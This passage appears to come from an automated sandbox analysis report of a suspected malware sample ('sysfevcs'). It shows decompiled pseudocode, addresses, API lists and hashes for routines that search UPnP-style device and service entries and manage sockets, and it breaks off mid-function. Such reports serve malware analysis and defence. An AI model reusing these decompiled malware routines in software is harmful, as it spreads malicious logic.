                                                                                                                                                                                                                                                                  • closesocket.WS2_32(?), ref: 0040E739
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BB80: NtQuerySystemTime.NTDLL ref: 0040BB8A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BB80: RtlTimeToSecondsSince1980.NTDLL ref: 0040BB98
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 671207744-0
                                                                                                                                                                                                                                                                  • Opcode ID: b79768d1b72cec46eaa8f69dca462b5c27b05df81c06aaaae392fe69171f8df6
                                                                                                                                                                                                                                                                  • Instruction ID: 51cd7334bbd969a96dec868ba5125ba97ee3022df73e2af357cdf7292c47256f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b79768d1b72cec46eaa8f69dca462b5c27b05df81c06aaaae392fe69171f8df6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0151CD75608702ABC714DF39D888B97F7E0BFC8314F408A3EE48993351D735A5198B96
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                                                                                                                                                  			E0040C600(intOrPtr* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                                                  				char _v8;
                                                                                                                                                                                                                                                                  				WCHAR* _v12;
                                                                                                                                                                                                                                                                  				WCHAR* _v16;
                                                                                                                                                                                                                                                                  				void* _v20;
                                                                                                                                                                                                                                                                  				WCHAR* _v24;
                                                                                                                                                                                                                                                                  				intOrPtr* _v28;
                                                                                                                                                                                                                                                                  				WCHAR* _v32;
                                                                                                                                                                                                                                                                  				intOrPtr* _t65;
                                                                                                                                                                                                                                                                  				void* _t99;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_push( &_v8);
                                                                                                                                                                                                                                                                  				_push(_a4);
                                                                                                                                                                                                                                                                  				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                                                                                                                                                                                                  					_v16 = 0;
                                                                                                                                                                                                                                                                  					while(_v16 < _v8) {
                                                                                                                                                                                                                                                                  						_v20 = 0;
                                                                                                                                                                                                                                                                  						_push( &_v20);
                                                                                                                                                                                                                                                                  						_push(_v16);
                                                                                                                                                                                                                                                                  						_push(_a4);
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                                                                                                                                                                                                  							L21:
                                                                                                                                                                                                                                                                  							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                  							continue;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_v24 = 0;
                                                                                                                                                                                                                                                                  							_push( &_v24);
                                                                                                                                                                                                                                                                  							_push(_v20);
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                                                                                                                                                                                                  								if(lstrcmpiW(_v24, L"device") == 0) {
                                                                                                                                                                                                                                                                  									_t65 = E0040BF20(_v20, L"deviceType");
                                                                                                                                                                                                                                                                  									_t99 = _t99 + 8;
                                                                                                                                                                                                                                                                  									_v28 = _t65;
                                                                                                                                                                                                                                                                  									if(_v28 != 0) {
                                                                                                                                                                                                                                                                  										_v32 = 0;
                                                                                                                                                                                                                                                                  										_push( &_v32);
                                                                                                                                                                                                                                                                  										_push(_v28);
                                                                                                                                                                                                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                                                                                                                                                                                                  											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                                                                                                                                                                                                  												_v12 = _v20;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											__imp__#6(_v32);
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								__imp__#6(_v24);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							if(_v12 == 0) {
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                                                                                                                                                                                                  								goto L21;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L22;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L22:
                                                                                                                                                                                                                                                                  				return _v12;
                                                                                                                                                                                                                                                                  			}












                                                                                                                                                                                                                                                                  0x0040c606
                                                                                                                                                                                                                                                                  0x0040c60d
                                                                                                                                                                                                                                                                  0x0040c617
                                                                                                                                                                                                                                                                  0x0040c620
                                                                                                                                                                                                                                                                  0x0040c628
                                                                                                                                                                                                                                                                  0x0040c638
                                                                                                                                                                                                                                                                  0x0040c64a
                                                                                                                                                                                                                                                                  0x0040c656
                                                                                                                                                                                                                                                                  0x0040c660
                                                                                                                                                                                                                                                                  0x0040c664
                                                                                                                                                                                                                                                                  0x0040c66d
                                                                                                                                                                                                                                                                  0x0040c675
                                                                                                                                                                                                                                                                  0x0040c753
                                                                                                                                                                                                                                                                  0x0040c647
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c685
                                                                                                                                                                                                                                                                  0x0040c685
                                                                                                                                                                                                                                                                  0x0040c68f
                                                                                                                                                                                                                                                                  0x0040c698
                                                                                                                                                                                                                                                                  0x0040c6a3
                                                                                                                                                                                                                                                                  0x0040c6c4
                                                                                                                                                                                                                                                                  0x0040c6cf
                                                                                                                                                                                                                                                                  0x0040c6d4
                                                                                                                                                                                                                                                                  0x0040c6d7
                                                                                                                                                                                                                                                                  0x0040c6de
                                                                                                                                                                                                                                                                  0x0040c6e0
                                                                                                                                                                                                                                                                  0x0040c6ea
                                                                                                                                                                                                                                                                  0x0040c6f3
                                                                                                                                                                                                                                                                  0x0040c6fb
                                                                                                                                                                                                                                                                  0x0040c713
                                                                                                                                                                                                                                                                  0x0040c718
                                                                                                                                                                                                                                                                  0x0040c718
                                                                                                                                                                                                                                                                  0x0040c71f
                                                                                                                                                                                                                                                                  0x0040c71f
                                                                                                                                                                                                                                                                  0x0040c731
                                                                                                                                                                                                                                                                  0x0040c731
                                                                                                                                                                                                                                                                  0x0040c6de
                                                                                                                                                                                                                                                                  0x0040c737
                                                                                                                                                                                                                                                                  0x0040c737
                                                                                                                                                                                                                                                                  0x0040c741
                                                                                                                                                                                                                                                                  0x0040c751
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c743
                                                                                                                                                                                                                                                                  0x0040c741
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c675
                                                                                                                                                                                                                                                                  0x0040c64a
                                                                                                                                                                                                                                                                  0x0040c758
                                                                                                                                                                                                                                                                  0x0040c75e

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,device), ref: 0040C6BC
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C70B
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C71F
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C737
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                  • String ID: device$deviceType
                                                                                                                                                                                                                                                                  • API String ID: 1602765415-3511266565
                                                                                                                                                                                                                                                                  • Opcode ID: fe87e6628fcac155b9e879abce0148de49b56393ca47e6d93c48dfd4937e9403
                                                                                                                                                                                                                                                                  • Instruction ID: 946d26c0edd9c36ec89eb3e0069362279d3cced2e82af026dca6f4f88739a964
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe87e6628fcac155b9e879abce0148de49b56393ca47e6d93c48dfd4937e9403
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3341F975A0020ADFCB14DF98C884BAFB7B9BF48304F108669E515B73A0D778AA45CF95
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                                                                                                                                                  			E0040C420(intOrPtr* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                                                  				char _v8;
                                                                                                                                                                                                                                                                  				WCHAR* _v12;
                                                                                                                                                                                                                                                                  				WCHAR* _v16;
                                                                                                                                                                                                                                                                  				void* _v20;
                                                                                                                                                                                                                                                                  				WCHAR* _v24;
                                                                                                                                                                                                                                                                  				intOrPtr* _v28;
                                                                                                                                                                                                                                                                  				WCHAR* _v32;
                                                                                                                                                                                                                                                                  				intOrPtr* _t65;
                                                                                                                                                                                                                                                                  				void* _t99;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_push( &_v8);
                                                                                                                                                                                                                                                                  				_push(_a4);
                                                                                                                                                                                                                                                                  				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                                                                                                                                                                                                  					_v16 = 0;
                                                                                                                                                                                                                                                                  					while(_v16 < _v8) {
                                                                                                                                                                                                                                                                  						_v20 = 0;
                                                                                                                                                                                                                                                                  						_push( &_v20);
                                                                                                                                                                                                                                                                  						_push(_v16);
                                                                                                                                                                                                                                                                  						_push(_a4);
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                                                                                                                                                                                                  							L21:
                                                                                                                                                                                                                                                                  							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                  							continue;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_v24 = 0;
                                                                                                                                                                                                                                                                  							_push( &_v24);
                                                                                                                                                                                                                                                                  							_push(_v20);
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                                                                                                                                                                                                  								if(lstrcmpiW(_v24, L"service") == 0) {
                                                                                                                                                                                                                                                                  									_t65 = E0040BF20(_v20, L"serviceType");
                                                                                                                                                                                                                                                                  									_t99 = _t99 + 8;
                                                                                                                                                                                                                                                                  									_v28 = _t65;
                                                                                                                                                                                                                                                                  									if(_v28 != 0) {
                                                                                                                                                                                                                                                                  										_v32 = 0;
                                                                                                                                                                                                                                                                  										_push( &_v32);
                                                                                                                                                                                                                                                                  										_push(_v28);
                                                                                                                                                                                                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                                                                                                                                                                                                  											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                                                                                                                                                                                                  												_v12 = _v20;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											__imp__#6(_v32);
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								__imp__#6(_v24);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							if(_v12 == 0) {
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                                                                                                                                                                                                  								goto L21;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L22;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L22:
                                                                                                                                                                                                                                                                  				return _v12;
                                                                                                                                                                                                                                                                  			}












                                                                                                                                                                                                                                                                  0x0040c426
                                                                                                                                                                                                                                                                  0x0040c42d
                                                                                                                                                                                                                                                                  0x0040c437
                                                                                                                                                                                                                                                                  0x0040c440
                                                                                                                                                                                                                                                                  0x0040c448
                                                                                                                                                                                                                                                                  0x0040c458
                                                                                                                                                                                                                                                                  0x0040c46a
                                                                                                                                                                                                                                                                  0x0040c476
                                                                                                                                                                                                                                                                  0x0040c480
                                                                                                                                                                                                                                                                  0x0040c484
                                                                                                                                                                                                                                                                  0x0040c48d
                                                                                                                                                                                                                                                                  0x0040c495
                                                                                                                                                                                                                                                                  0x0040c573
                                                                                                                                                                                                                                                                  0x0040c467
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c4a5
                                                                                                                                                                                                                                                                  0x0040c4a5
                                                                                                                                                                                                                                                                  0x0040c4af
                                                                                                                                                                                                                                                                  0x0040c4b8
                                                                                                                                                                                                                                                                  0x0040c4c3
                                                                                                                                                                                                                                                                  0x0040c4e4
                                                                                                                                                                                                                                                                  0x0040c4ef
                                                                                                                                                                                                                                                                  0x0040c4f4
                                                                                                                                                                                                                                                                  0x0040c4f7
                                                                                                                                                                                                                                                                  0x0040c4fe
                                                                                                                                                                                                                                                                  0x0040c500
                                                                                                                                                                                                                                                                  0x0040c50a
                                                                                                                                                                                                                                                                  0x0040c513
                                                                                                                                                                                                                                                                  0x0040c51b
                                                                                                                                                                                                                                                                  0x0040c533
                                                                                                                                                                                                                                                                  0x0040c538
                                                                                                                                                                                                                                                                  0x0040c538
                                                                                                                                                                                                                                                                  0x0040c53f
                                                                                                                                                                                                                                                                  0x0040c53f
                                                                                                                                                                                                                                                                  0x0040c551
                                                                                                                                                                                                                                                                  0x0040c551
                                                                                                                                                                                                                                                                  0x0040c4fe
                                                                                                                                                                                                                                                                  0x0040c557
                                                                                                                                                                                                                                                                  0x0040c557
                                                                                                                                                                                                                                                                  0x0040c561
                                                                                                                                                                                                                                                                  0x0040c571
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c563
                                                                                                                                                                                                                                                                  0x0040c561
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c495
                                                                                                                                                                                                                                                                  0x0040c46a
                                                                                                                                                                                                                                                                  0x0040c578
                                                                                                                                                                                                                                                                  0x0040c57e

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,service), ref: 0040C4DC
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C52B
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C53F
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C557
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                  • String ID: service$serviceType
                                                                                                                                                                                                                                                                  • API String ID: 1602765415-3667235276
                                                                                                                                                                                                                                                                  • Opcode ID: 61097aceb2625611fabd3a5b989b159f71deee9e717a61a2438811a1ee708ea0
                                                                                                                                                                                                                                                                  • Instruction ID: 4db9edca9011b541f59a0e3a8f8a08950e70cb3f27b3d3dc9fef26094afeab9d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61097aceb2625611fabd3a5b989b159f71deee9e717a61a2438811a1ee708ea0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8410C75A0021AEFCB14DF98CC94BAFB7B5BF48304F108269E515B73A0D738A985CB95
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                                                                                                                  			E0040DCB0(intOrPtr __eax, void* _a4) {
                                                                                                                                                                                                                                                                  				void* __esi;
                                                                                                                                                                                                                                                                  				intOrPtr _t20;
                                                                                                                                                                                                                                                                  				long _t28;
                                                                                                                                                                                                                                                                  				long _t37;
                                                                                                                                                                                                                                                                  				intOrPtr _t45;
                                                                                                                                                                                                                                                                  				struct _CRITICAL_SECTION* _t48;
                                                                                                                                                                                                                                                                  				long _t49;
                                                                                                                                                                                                                                                                  				void* _t53;
                                                                                                                                                                                                                                                                  				void* _t54;
                                                                                                                                                                                                                                                                  				void* _t55;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t53 = _a4;
                                                                                                                                                                                                                                                                  				_t45 = __eax;
                                                                                                                                                                                                                                                                  				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					_t48 = __eax + 0x20;
                                                                                                                                                                                                                                                                  					_t37 = 0;
                                                                                                                                                                                                                                                                  					EnterCriticalSection(_t48);
                                                                                                                                                                                                                                                                  					_t20 =  *((intOrPtr*)(_t45 + 0x38));
                                                                                                                                                                                                                                                                  					if(_t20 != 0) {
                                                                                                                                                                                                                                                                  						while( *((intOrPtr*)(_t20 + 0x260)) != _t53) {
                                                                                                                                                                                                                                                                  							_t20 =  *((intOrPtr*)(_t20 + 0x280));
                                                                                                                                                                                                                                                                  							if(_t20 != 0) {
                                                                                                                                                                                                                                                                  								continue;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L7;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t37 = 1;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L7:
                                                                                                                                                                                                                                                                  					LeaveCriticalSection(_t48);
                                                                                                                                                                                                                                                                  					if(_t37 == 0) {
                                                                                                                                                                                                                                                                  						_t49 = E00408820(0x284);
                                                                                                                                                                                                                                                                  						_t55 = _t54 + 4;
                                                                                                                                                                                                                                                                  						if(_t49 == 0) {
                                                                                                                                                                                                                                                                  							L13:
                                                                                                                                                                                                                                                                  							E00409320(_t53);
                                                                                                                                                                                                                                                                  							return _t49;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_t7 = _t49 + 0x264; // 0x264
                                                                                                                                                                                                                                                                  							 *_t49 = 0x69636c69;
                                                                                                                                                                                                                                                                  							 *(_t49 + 0x260) = _t53;
                                                                                                                                                                                                                                                                  							_a4 = 0x10;
                                                                                                                                                                                                                                                                  							__imp__#5(_t53, _t7,  &_a4);
                                                                                                                                                                                                                                                                  							if(CreateIoCompletionPort( *(_t49 + 0x260),  *(_t45 + 8), _t49, 0) !=  *(_t45 + 8)) {
                                                                                                                                                                                                                                                                  								E00408990(_t49);
                                                                                                                                                                                                                                                                  								_t55 = _t55 + 4;
                                                                                                                                                                                                                                                                  								_t49 = 0;
                                                                                                                                                                                                                                                                  								goto L13;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_t28 = E0040BB80();
                                                                                                                                                                                                                                                                  								_t13 = _t49 + 4; // 0x4
                                                                                                                                                                                                                                                                  								InterlockedExchange(_t13, _t28);
                                                                                                                                                                                                                                                                  								_t14 = _t49 + 0x244; // 0x244
                                                                                                                                                                                                                                                                  								_t15 = _t49 + 8; // 0x8
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_t49 + 0x27c)) = _t45;
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_t49 + 0x224)) = 0x200;
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_t49 + 0x228)) = _t15;
                                                                                                                                                                                                                                                                  								InitializeCriticalSection(_t14);
                                                                                                                                                                                                                                                                  								InterlockedIncrement(_t45 + 0x3c);
                                                                                                                                                                                                                                                                  								E0040DBD0(_t49);
                                                                                                                                                                                                                                                                  								return _t49;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						return 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					return 0;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}













                                                                                                                                                                                                                                                                  0x0040dcb1
                                                                                                                                                                                                                                                                  0x0040dcb6
                                                                                                                                                                                                                                                                  0x0040dcbb
                                                                                                                                                                                                                                                                  0x0040dcc4
                                                                                                                                                                                                                                                                  0x0040dcc8
                                                                                                                                                                                                                                                                  0x0040dcca
                                                                                                                                                                                                                                                                  0x0040dcd0
                                                                                                                                                                                                                                                                  0x0040dcd5
                                                                                                                                                                                                                                                                  0x0040dcd7
                                                                                                                                                                                                                                                                  0x0040dcdf
                                                                                                                                                                                                                                                                  0x0040dce7
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040dce9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040dce7
                                                                                                                                                                                                                                                                  0x0040dceb
                                                                                                                                                                                                                                                                  0x0040dceb
                                                                                                                                                                                                                                                                  0x0040dced
                                                                                                                                                                                                                                                                  0x0040dcee
                                                                                                                                                                                                                                                                  0x0040dcf6
                                                                                                                                                                                                                                                                  0x0040dd09
                                                                                                                                                                                                                                                                  0x0040dd0b
                                                                                                                                                                                                                                                                  0x0040dd10
                                                                                                                                                                                                                                                                  0x0040ddad
                                                                                                                                                                                                                                                                  0x0040ddae
                                                                                                                                                                                                                                                                  0x0040ddbc
                                                                                                                                                                                                                                                                  0x0040dd16
                                                                                                                                                                                                                                                                  0x0040dd1b
                                                                                                                                                                                                                                                                  0x0040dd23
                                                                                                                                                                                                                                                                  0x0040dd29
                                                                                                                                                                                                                                                                  0x0040dd2f
                                                                                                                                                                                                                                                                  0x0040dd37
                                                                                                                                                                                                                                                                  0x0040dd54
                                                                                                                                                                                                                                                                  0x0040dda3
                                                                                                                                                                                                                                                                  0x0040dda8
                                                                                                                                                                                                                                                                  0x0040ddab
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040dd56
                                                                                                                                                                                                                                                                  0x0040dd56
                                                                                                                                                                                                                                                                  0x0040dd5c
                                                                                                                                                                                                                                                                  0x0040dd60
                                                                                                                                                                                                                                                                  0x0040dd66
                                                                                                                                                                                                                                                                  0x0040dd6c
                                                                                                                                                                                                                                                                  0x0040dd70
                                                                                                                                                                                                                                                                  0x0040dd76
                                                                                                                                                                                                                                                                  0x0040dd80
                                                                                                                                                                                                                                                                  0x0040dd86
                                                                                                                                                                                                                                                                  0x0040dd90
                                                                                                                                                                                                                                                                  0x0040dd96
                                                                                                                                                                                                                                                                  0x0040dda1
                                                                                                                                                                                                                                                                  0x0040dda1
                                                                                                                                                                                                                                                                  0x0040dd54
                                                                                                                                                                                                                                                                  0x0040dcf8
                                                                                                                                                                                                                                                                  0x0040dcfe
                                                                                                                                                                                                                                                                  0x0040dcfe
                                                                                                                                                                                                                                                                  0x0040dcbe
                                                                                                                                                                                                                                                                  0x0040dcc1
                                                                                                                                                                                                                                                                  0x0040dcc1

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,0040E1BB,00000000), ref: 0040DCCA
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E1BB,00000000), ref: 0040DCEE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                  • Opcode ID: cabd4db7ba3084efa7437f09721efa20128da1dd7b227cb8f85169ea1241f03a
                                                                                                                                                                                                                                                                  • Instruction ID: 92082c62fa9631858f637837eb2946efbfd8580dbf5aa9204641a4763d3c3573
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cabd4db7ba3084efa7437f09721efa20128da1dd7b227cb8f85169ea1241f03a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D31F1726002059BD320ABB5ED48A97B3E8FF40724F00453EE54AE7681DB38A808CB99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                                                                                                                                                  			E0040C641() {
                                                                                                                                                                                                                                                                  				void* _t85;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				L0:
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					L0:
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L2:
                                                                                                                                                                                                                                                                  					 *(_t85 - 0x10) = 0;
                                                                                                                                                                                                                                                                  					_push(_t85 - 0x10);
                                                                                                                                                                                                                                                                  					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                                                                                                                                                                                                  					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                                                                                                                                                                                                  						L18:
                                                                                                                                                                                                                                                                  						continue;
                                                                                                                                                                                                                                                                  					} else {
